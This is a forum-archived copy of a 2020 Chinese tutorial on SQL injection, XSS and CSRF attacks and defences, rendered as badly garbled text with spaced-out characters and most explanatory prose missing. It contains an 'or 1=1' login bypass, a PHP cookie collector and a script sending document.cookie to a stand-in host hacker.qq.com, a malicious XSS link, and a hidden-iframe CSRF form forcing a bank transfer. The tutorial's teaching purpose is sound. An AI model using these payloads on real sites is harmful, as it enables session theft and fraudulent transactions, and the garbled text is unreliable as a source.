搜索

[18150] 2020-09-30_常见web漏洞(Sql注入、XSS、CSRF)原理以及攻防总结

文档创建者:s7ckTeam
浏览次数:41
最后更新:2025-01-18
2020-09-30_常见web漏洞(Sql注入、XSS、CSRF)原理以及攻防总结 w e b S q l X S S C S R F q u a n w e i b a i   H A C K   2 0 2 0 - 0 9 - 3 0 q u a n w e i b a i           G i t H u b S q l S Q L S Q L W e b S Q L S Q L S Q L , S E L E C T   *   F R O M     u s e r s     W H E R E   l o g i n   =   ' v i c t o r '   A N D   p a s s w o r d   =   ' 1 2 3 S e v e r S t r i n g   s q l   =   " S E L E C T   *   F R O M   u s e r s   W H E R E   l o g i n   =   ' "   +   f o r m u s r   +   " '   A N D   p a s s w o r d   =   ' "   +   f o r m p w d   +   f o r m u s r   =   '   o r   1 = 1 f o r m p w d   =   a n y t h i n g S E L E C T   *   F R O M   u s e r s   W H E R E   u s e r n a m e   =   '   '   o r   1 = 1     A N D   p a s s w o r d   =   ' a n y t h i n g '   :   < > *   &   使 O R M S q l X s s X S S   ( C r o s s   S i t e   S c r i p t i n g )     W e b ( J a v a S c r i p t ) ,   .   C o o k i e ,
d o m X s s   h a c k e r . q q . c o m   h a c k . p h p : < ? p h p   $ c o o k i e   =   $ _ G E T [ ' q ' ] ; v a r _ d u m p ( $ c o o k i e ) ; $ m y F i l e   =   " c o o k i e . t x t " ; f i l e _ p u t _ c o n t e n t s ( $ m y F i l e ,   $ c o o k i e ) ; ? >   h a c k . j s v a r   i m g   =   n e w   I m a g e ( ) ; i m g . s r c   =   " h t t p : / / h a c k e r . q q . c o m / h a c k . p h p ? q = " + d o c u m e n t . c o o k i e ; d o c u m e n t . b o d y . a p p e n d ( i m g ) ; < a   h r e f = " h t t p : / / x s s t e s t . q q . c o m / s e a r c h . p h p ? q = % 3 C s c r i p t + s r c % 3 D h t t p % 3 A % 2 F % 2 F h a c k e r . q q . c o m % 2 F h a c k e r . j s % 3 E % 3 C % 2 F s c r i p t % 3 E & c o m m e n d = a l l & s s i d = s 5 - e & s e a r c h _ t y p e = i t e m & a t y p e = & f i l t e r F i n e n e s s = & r r = 1 & p c a t = f o o d 2 0 1 1 & s t y l e = g r i d & c a t = " > 9 9 8 < / a > x s s s e a r c h . p h p q   , s e a r c h . p h p   x s s t e s t . q q . c o m c o o k i e h t t p : / / x s s t e s t . q q . c o m < s c r i p t   s r c = " h t t p : / / h a c k e r . q q . c o m / h a c k e r . j s " > < / s c r i p t > < s c r i p t   s r c = " h t t p : / / h a c k e r . q q . c o m / h a c k e r . j s " > < / s c r i p t >
e n c o d e h t m l X S S h a c k . j s ,   h a c k . j s h a c k . j s j s C S R F C S R F C r o s s - s i t e   r e q u e s t   f o r g e r y o n e   c l i c k   a t t a c k / s e s s i o n   r i d i n g C S R F / X S R F C S R F C S R F . . . . . . A   B   访   A   A   访   B   B h t t p : / / b . c o m / c o m m e n t / d e l e t e ? i d = 8 1 7 2 3 A   访   B   C S R F     X s s   C S R F c o o k i e ,   X s s   C o o k i e 访 访   访 访 C S R F
< h t m l > < h e a d >     < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >         f u n c t i o n   s t e a l ( )         {                           i f r a m e   =   d o c u m e n t . f r a m e s [ " s t e a l " ] ;                           i f r a m e . d o c u m e n t . S u b m i t ( " t r a n s f e r " ) ;         }     < / s c r i p t > < / h e a d > < b o d y   o n l o a d = " s t e a l ( ) " >   < i f r a m e   n a m e = " s t e a l "   d i s p l a y = " n o n e " >       < f o r m   m e t h o d = " P O S T "   n a m e = " t r a n s f e r "   a c t i o n = " h t t p : / / w w w . m y B a n k . c o m / T r a n s f e r . p h p " >           < i n p u t   t y p e = " h i d d e n "   n a m e = " t o B a n k I d "   v a l u e = " 1 1 " >           < i n p u t   t y p e = " h i d d e n "   n a m e = " m o n e y "   v a l u e = " 1 0 0 0 " >       < / f o r m >   < / i f r a m e > < / b o d y > < / h t m l > C o o k i e   H a s h i n g ( ) c o o k i e < ? p h p       $ h a s h   =   m d 5 ( $ _ C O O K I E [ ' c o o k i e ' ] ) ;   ? >   < f o r m   m e t h o d = P O S T   a c t i o n = t r a n s f e r . p h p >       < i n p u t   t y p e = t e x t   n a m e = t o B a n k I d >       < i n p u t   t y p e = t e x t   n a m e = m o n e y >       < i n p u t   t y p e = h i d d e n   n a m e = h a s h   v a l u e = < ? = $ h a s h ; ? > >       < i n p u t   t y p e = s u b m i t   n a m e = s u b m i t   v a l u e = S u b m i t >   < / f o r m > H a s h _ _ _ _ _   e n d   _ _ _ _ _
: H A C K
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理